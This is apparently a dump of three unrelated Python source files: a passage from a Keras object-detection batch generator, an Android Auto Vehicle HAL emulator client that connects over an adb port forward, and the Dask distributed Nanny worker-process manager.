group_method='random', # one of 'none', 'random', 'ratio'
shuffle_groups=True,
image_min_side=800,
image_max_side=1333,
transform_parameters=None,
compute_anchor_targets=anchor_targets_bbox,
compute_shapes=guess_shapes,
preprocess_image=preprocess_image,
):
""" Initialize Generator object.
Args
transform_generator : A generator used to randomly transform images and annotations.
batch_size : The size of the batches to generate.
group_method : Determines how images are grouped together (defaults to 'ratio', one of ('none', 'random', 'ratio')).
shuffle_groups : If True, shuffles the groups each epoch.
image_min_side : After resizing the minimum side of an image is equal to image_min_side.
image_max_side : If after resizing the maximum side is larger than image_max_side, scales down further so that the max side is equal to image_max_side.
transform_parameters : The transform parameters used for data augmentation.
compute_anchor_targets : Function handler for computing the targets of anchors for an image and its annotations.
compute_shapes : Function handler for computing the shapes of the pyramid for a given input.
preprocess_image : Function handler for preprocessing an image (scaling / normalizing) for passing through a network.
"""
self.transform_generator = transform_generator
self.batch_size = int(batch_size)
self.group_method = group_method
self.shuffle_groups = shuffle_groups
self.image_min_side = image_min_side
self.image_max_side = image_max_side
self.transform_parameters = transform_parameters or TransformParameters()
self.compute_anchor_targets = compute_anchor_targets
self.compute_shapes = compute_shapes
self.preprocess_image = preprocess_image
self.group_index = 0
self.lock = threading.Lock()
self.group_images()
# self.q = queue.Queue(maxsize=3)
# self.p = threading.Thread(target=self.producer, args=())
# self.p.start()
def size(self):
""" Size of the dataset.
"""
raise NotImplementedError('size method not implemented')
def num_classes(self):
""" Number of classes in the dataset.
"""
raise NotImplementedError('num_classes method not implemented')
def name_to_label(self, name):
""" Map name to label.
"""
raise NotImplementedError('name_to_label method not implemented')
def label_to_name(self, label):
""" Map label to name.
"""
raise NotImplementedError('label_to_name method not implemented')
def image_aspect_ratio(self, image_index):
""" Compute the aspect ratio for an image with image_index.
"""
raise NotImplementedError('image_aspect_ratio method not implemented')
def load_image(self, image_index):
""" Load an image at the image_index.
"""
raise NotImplementedError('load_image method not implemented')
def load_annotations(self, image_index):
""" Load annotations for an image_index.
"""
raise NotImplementedError('load_annotations method not implemented')
def load_annotations_group(self, group):
""" Load annotations for all images in group.
"""
return [self.load_annotations(image_index) for image_index in group]
def filter_annotations(self, image_group, annotations_group, group):
""" Filter annotations by removing those that are outside of the image bounds or whose width/height < 0.
"""
# test all annotations
for index, (image, annotations) in enumerate(zip(image_group, annotations_group)):
assert(isinstance(annotations, np.ndarray)), '\'load_annotations\' should return a list of numpy arrays, received: {}'.format(type(annotations))
# test x2 < x1 | y2 < y1 | x1 < 0 | y1 < 0 | x2 <= 0 | y2 <= 0 | x2 >= image.shape[1] | y2 >= image.shape[0]
invalid_indices = np.where(
(annotations[:, 2] <= annotations[:, 0]) |
(annotations[:, 3] <= annotations[:, 1]) |
(annotations[:, 0] < 0) |
(annotations[:, 1] < 0) |
(annotations[:, 2] > image.shape[1]) |
(annotations[:, 3] > image.shape[0])
)[0]
# delete invalid indices
if len(invalid_indices):
warnings.warn('Image with id {} (shape {}) contains the following invalid boxes: {}.'.format(
group[index],
image.shape,
[annotations[invalid_index, :] for invalid_index in invalid_indices]
))
annotations_group[index] = np.delete(annotations, invalid_indices, axis=0)
return image_group, annotations_group
def load_image_group(self, group):
""" Load images for all images in a group.
"""
return [self.load_image(image_index) for image_index in group]
def random_transform_group_entry(self, image, annotations):
""" Randomly transforms image and annotation.
"""
# randomly transform both image and annotations
if self.transform_generator:
transform = adjust_transform_for_image(next(self.transform_generator), image, self.transform_parameters.relative_translation)
image = apply_transform(transform, image, self.transform_parameters)
# Transform the bounding boxes in the annotations.
annotations = annotations.copy()
for index in range(annotations.shape[0]):
annotations[index, :4] = transform_aabb(transform, annotations[index, :4])
return image, annotations
def resize_image(self, image):
""" Resize an image using image_min_side and image_max_side.
"""
return resize_image(image, min_side=self.image_min_side, max_side=self.image_max_side)
def preprocess_group_entry(self, image, annotations):
""" Preprocess image and its annotations.
"""
# preprocess the image
image = self.preprocess_image(image)
# randomly transform image and annotations
image, annotations = self.random_transform_group_entry(image, annotations)
# resize image
image, image_scale = self.resize_image(image)
# apply resizing to annotations too
annotations[:, :4] *= image_scale
return image, annotations
def preprocess_group(self, image_group, annotations_group):
""" Preprocess each image and its annotations in its group.
"""
for index, (image, annotations) in enumerate(zip(image_group, annotations_group)):
# preprocess a single group entry
image, annotations = self.preprocess_group_entry(image, annotations)
# copy processed data back to group
image_group[index] = image
annotations_group[index] = annotations
return image_group, annotations_group
def group_images(self):
""" Order the images according to self.order and makes groups of self.batch_size.
"""
# determine the order of the images
order = list(range(self.size()))
if self.group_method == 'random':
random.shuffle(order)
elif self.group_method == 'ratio':
order.sort(key=lambda x: self.image_aspect_ratio(x))
# divide into groups, one group = one batch
self.groups = [[order[x % len(order)] for x in range(i, i + self.batch_size)] for i in range(0, len(order), self.batch_size)]
def compute_inputs(self, image_group):
""" Compute inputs for the network using an image_group.
"""
# get the max image shape
max_shape = tuple(max(image.shape[x] for image in image_group) for x in range(3))
# construct an image batch object
image_batch = np.zeros((self.batch_size,) + max_shape, dtype=keras.backend.floatx())
# copy all images to the upper left part of the image batch object
for image_index, image in enumerate(image_group):
image_batch[image_index, :image.shape[0], :image.shape[1], :image.shape[2]] = image
return image_batch
def generate_anchors(self, image_shape):
return anchors_for_shape(image_shape, shapes_callback=self.compute_shapes)
def compute_targets(self, image_group, annotations_group):
""" Compute target outputs for the network using images and their annotations.
"""
# get the max image shape
max_shape = tuple(max(image.shape[x] for image in image_group) for x in range(3))
anchors = self.generate_anchors(max_shape)
regression_batch = np.empty((self.batch_size, anchors.shape[0], 4 + 1), dtype=keras.backend.floatx())
labels_batch = np.empty((self.batch_size, anchors.shape[0], self.num_classes() + 1), dtype=keras.backend.floatx())
# compute labels and regression targets
for index, (image, annotations) in enumerate(zip(image_group, annotations_group)):
# compute regression targets
labels_batch[index, :, :-1], annotations, labels_batch[index, :, -1] = self.compute_anchor_targets(
anchors,
annotations,
self.num_classes(),
mask_shape=image.shape,
)
regression_batch[index, :, :-1] = bbox_transform(anchors, annotations)
regression_batch[index, :, -1] = labels_batch[index, :, -1] # copy the anchor states to the regression batch
return [regression_batch, labels_batch]
def compute_input_output(self, group):
""" Compute inputs and target outputs for the network.
"""
# load images and annotations
image_group = self.load_image_group(group)
annotations_group = self.load_annotations_group(group)
# check validity of annotations
image_group, annotations_group = self.filter_annotations(image_group, annotations_group, group)
# perform preprocessing steps
image_group, annotations_group = self.preprocess_group(image_group, annotations_group)
# compute network inputs
inputs = self.compute_inputs(image_group)
# compute network targets
targets = self.compute_targets(image_group, annotations_group)
return inputs, targets
def __next__(self):
return self.next()
def next(self):
# advance the group index
with self.lock:
if self.group_index == 0 and self.shuffle_groups:
# shuffle groups at start of epoch
random.shuffle(self.groups)
group = self.groups[self.group_index]
self.group_index = (self.group_index + 1) % len(self.groups)
return self.compute_input_output(group)
# def producer(self):
# while True:
# try:
# # advance the group index
# if self.q.qsize() < 3:
# with self.lock:
# if self.group_index == 0 and self.shuffle_groups:
# # shuffle groups at start of epoch
# random.shuffle(self.groups)
# group = self.groups[self.group_index]
# self.group_index = (self.group_index + 1) % len(self.groups)
#
# inputs, targets = self.compute_input_output(group)
# self.q.put((inputs, targets))
# # print(self.q.qsize())
# except Exception as ex:
# print(ex)
#
# def consumer(self):
# try:
# value = self.q.get(True)
# return value
# except Exception as ex:
# print(ex)
#
# def next(self):
# return self.consumer()
#
# def __del__(self):
# self.p.join()
|
vhal_emulator.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module provides a vhal class which sends and receives messages to the vehicle HAL module
on an Android Auto device. It uses port forwarding via ADB to communicate with the Android
device.
Example Usage:
import vhal_consts_2_0 as c
from vhal_emulator import Vhal
# Create an instance of vhal class. Need to pass the vhal_types constants.
v = Vhal(c.vhal_types_2_0)
# Get the property config (if desired)
v.getConfig(c.VEHICLEPROPERTY_HVAC_TEMPERATURE_SET)
# Get the response message to getConfig()
reply = v.rxMsg()
print(reply)
# Set left temperature to 70 degrees
v.setProperty(c.VEHICLEPROPERTY_HVAC_TEMPERATURE_SET, c.VEHICLEAREAZONE_ROW_1_LEFT, 70)
# Get the response message to setProperty()
reply = v.rxMsg()
print(reply)
# Get the left temperature value
v.getProperty(c.VEHICLEPROPERTY_HVAC_TEMPERATURE_SET, c.VEHICLEAREAZONE_ROW_1_LEFT)
# Get the response message to getProperty()
reply = v.rxMsg()
print(reply)
NOTE: The rxMsg() is a blocking call, so it may be desirable to set up a separate RX thread
to handle any asynchronous messages coming from the device.
Example for creating RX thread (assumes vhal has already been instantiated):
from threading import Thread
# Define a simple thread that receives messages from a vhal object (v) and prints them
def rxThread(v):
while(1):
print v.rxMsg()
rx = Thread(target=rxThread, args=(v,))
rx.start()
Protocol Buffer:
This module relies on VehicleHalProto_pb2.py being in sync with the protobuf in the VHAL.
If the VehicleHalProto.proto file has changed, re-generate the python version using:
protoc -I=<proto_dir> --python_out=<out_dir> <proto_dir>/VehicleHalProto.proto
"""
from __future__ import print_function
# Suppress .pyc files
import sys
sys.dont_write_bytecode = True
import socket
import struct
import subprocess
# Generate the protobuf file from hardware/interfaces/automotive/vehicle/2.0/default/impl/vhal_v2_0
# It is recommended to use the protoc provided in: prebuilts/tools/common/m2/repository/com/google/protobuf/protoc/3.0.0
# or a later version, in order to provide Python 3 compatibility
# protoc -I=proto --python_out=proto proto/VehicleHalProto.proto
import VehicleHalProto_pb2
# If container is a dictionary, retrieve the value for key item;
# Otherwise, get the attribute named item out of container
def getByAttributeOrKey(container, item, default=None):
if isinstance(container, dict):
try:
return container[item]
except KeyError as e:
return default
try:
return getattr(container, item)
except AttributeError as e:
return default
class Vhal:
"""
Dictionary of prop_id to value_type. Used by setProperty() to properly format data.
"""
_propToType = {}
### Private Functions
def _txCmd(self, cmd):
"""
Transmits a protobuf to Android Auto device. Should not be called externally.
"""
# Serialize the protobuf into a string
msgStr = cmd.SerializeToString()
msgLen = len(msgStr)
# Convert the message length into int32 byte array
msgHdr = struct.pack('!I', msgLen)
# Send the message length first
self.sock.sendall(msgHdr)
# print("hello")
# Then send the protobuf
self.sock.sendall(msgStr)
### Public Functions
def printHex(self, data):
"""
For debugging, print the protobuf message string in hex.
"""
print("len = ", len(data), "str = ",
":".join("{:02x}".format(ord(d)) for d in data))
def openSocket(self, device=None):
"""
Connects to an Android Auto device running a Vehicle HAL with simulator.
"""
# Hard-coded socket port needs to match the one in DefaultVehicleHal
remotePortNumber = 33452
extraArgs = '' if device is None else '-s %s' % device
adbCmd = '/home/himinds/Android/android-pie-compile/out/host/linux-x86/bin/adb %s forward tcp:0 tcp:%d' % (
extraArgs, remotePortNumber)
adbResp = subprocess.check_output(adbCmd, shell=True)[0:-1]
localPortNumber = int(adbResp)
#localPortNumber = 44567
#adbCmd1 = 'qemu-system-x86_64 -m 2048 -boot d -enable-kvm -smp 3 -net nic -net user,hostfwd=tcp::4444-:5555,hostfwd=tcp::%d-:33452 -hda /home/himinds/Android/android-image-x86_64/android-oreo.img -cdrom /home/himinds/Android/android-x86-oreo/out/target/product/x86_64android_x86_64.iso' % (extraArgs, localPortNumber)
#adbResp1 = subprocess.check_output(adbCmd1, shell=True)[0:-1]
print('Connecting local port %s to remote port %s on %s' %
(localPortNumber, remotePortNumber,
'default device' if device is None else 'device %s' % device))
# Open the socket and connect
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(('localhost', localPortNumber))
print("hello")
def rxMsg(self):
"""
Receive a message over the socket. This function blocks if a message is not available.
May want to wrap this function inside of an rx thread to also collect asynchronous
messages generated by the device.
"""
# Receive the message length (int32) first
b = self.sock.recv(4)
if (len(b) == 4):
msgLen, = struct.unpack('!I', b)
if (msgLen > 0):
# Receive the actual message
b = self.sock.recv(msgLen)
if (len(b) == msgLen):
# Unpack the protobuf
msg = VehicleHalProto_pb2.EmulatorMessage()
msg.ParseFromString(b)
return msg
else:
print("Ignored message fragment")
def getConfig(self, prop):
"""
Sends a getConfig message for the specified property.
"""
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.GET_CONFIG_CMD
propGet = cmd.prop.add()
propGet.prop = prop
self._txCmd(cmd)
def getConfigAll(self):
"""
Sends a getConfigAll message to the host. This will return all configs available.
"""
print("getCONFIGALL")
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.GET_CONFIG_ALL_CMD
self._txCmd(cmd)
def getProperty(self, prop, area_id):
"""
Sends a getProperty command for the specified property ID and area ID.
"""
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.GET_PROPERTY_CMD
propGet = cmd.prop.add()
propGet.prop = prop
propGet.area_id = area_id
self._txCmd(cmd)
def getPropertyAll(self):
"""
Sends a getPropertyAll message to the host. This will return all properties available.
"""
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.GET_PROPERTY_ALL_CMD
self._txCmd(cmd)
def setProperty(self,
prop,
area_id,
value,
status=VehicleHalProto_pb2.AVAILABLE):
"""
Sends a setProperty command for the specified property ID, area ID, value and status.
If Status is not specified, automatically send AVAILABLE as the default.
This function chooses the proper value field to populate based on the config for the
property. It is the caller's responsibility to ensure the value data is the proper
type.
"""
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.SET_PROPERTY_CMD
propValue = cmd.value.add()
propValue.prop = prop
# Insert value into the proper area
propValue.area_id = area_id
propValue.status = status
# Determine the value_type and populate the correct value field in protoBuf
try:
valType = self._propToType[prop]
except KeyError:
raise ValueError('propId is invalid:', prop)
return
propValue.value_type = valType
if valType in self._types.TYPE_STRING:
propValue.string_value = value
elif valType in self._types.TYPE_BYTES:
propValue.bytes_value = value
elif valType in self._types.TYPE_INT32:
propValue.int32_values.append(value)
elif valType in self._types.TYPE_INT64:
propValue.int64_values.append(value)
elif valType in self._types.TYPE_FLOAT:
propValue.float_values.append(value)
elif valType in self._types.TYPE_INT32S:
propValue.int32_values.extend(value)
elif valType in self._types.TYPE_FLOATS:
propValue.float_values.extend(value)
elif valType in self._types.TYPE_MIXED:
propValue.string_value = \
getByAttributeOrKey(value, 'string_value', '')
propValue.bytes_value = \
getByAttributeOrKey(value, 'bytes_value', '')
for newValue in getByAttributeOrKey(value, 'int32_values', []):
propValue.int32_values.append(newValue)
for newValue in getByAttributeOrKey(value, 'int64_values', []):
propValue.int64_values.append(newValue)
for newValue in getByAttributeOrKey(value, 'float_values', []):
propValue.float_values.append(newValue)
else:
raise ValueError('value type not recognized:', valType)
return
self._txCmd(cmd)
def __init__(self, types, device=None):
# Save the list of types constants
self._types = types
# Open the socket
self.openSocket(device)
# Get the list of configs
self.getConfigAll()
msg = self.rxMsg()
# Parse the list of configs to generate a dictionary of prop_id to type
for cfg in msg.config:
self._propToType[cfg.prop] = cfg.value_type
|
nanny.py
|
import asyncio
import errno
import logging
import os
import shutil
import threading
import uuid
import warnings
import weakref
from contextlib import suppress
from multiprocessing.queues import Empty
from time import sleep as sync_sleep
import psutil
from tornado import gen
from tornado.ioloop import IOLoop, PeriodicCallback
import dask
from dask.system import CPU_COUNT
from dask.utils import parse_timedelta
from . import preloading
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import CommClosedError, RPCClosed, Status, coerce_to_address
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
TimeoutError,
get_ip,
json_load_robust,
mp_context,
parse_ports,
silence_logging,
)
from .worker import Worker, parse_memory_limit, run
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
"""A process to manage worker processes
The nanny spins up Worker processes, watches then, and kills or restarts
them as necessary. It is necessary if you want to use the
``Client.restart`` method, or to restart the worker automatically if
it gets to the terminate fractiom of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
"""
_instances = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
if not os.path.exists(local_directory):
os.makedirs(local_directory)
self._original_local_dir = local_directory
local_directory = os.path.join(local_directory, "dask-worker-space")
else:
self._original_local_dir = local_directory
self.local_directory = local_directory
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or dask.config.config
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side for naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super().__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
"""For API compatibility with Nanny"""
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
"""Start nanny, start local process, start watching"""
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise
else:
self._start_address = start_address
break
else:
raise ValueError(
f"Could not start Nanny on host {self._start_host}"
f"with port {self._start_port}"
)
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == Status.running:
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
"""Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None) -> Status:
"""Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self._original_local_dir,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
try:
result = await self.process.start()
except Exception:
await self.close()
raise
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
"""Track worker's memory. Restart if it goes above terminate fraction"""
if self.status != Status.running:
return
if self.process is None or self.process.process is None:
return None
process = self.process.process
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (
Status.init,
Status.closing,
Status.closed,
Status.closing_gracefully,
):
try:
await self._unregister()
except OSError:
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess:
# The interval how often to check the msg queue for init
_init_msg_interval = 0.05
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self) -> Status:
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
self.status = Status.failed
return self.status
try:
msg = await self._wait_until_connected(uid)
except Exception:
self.status = Status.failed
self.process.terminate()
raise
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = Status.running
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
while True:
if self.status != Status.starting:
return
# This is a multiprocessing queue and we'd block the event loop if
# we simply called get
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(self._init_msg_interval)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
try:
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=True,
nanny=False,
safe=True, # TODO: Graceful or not?
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
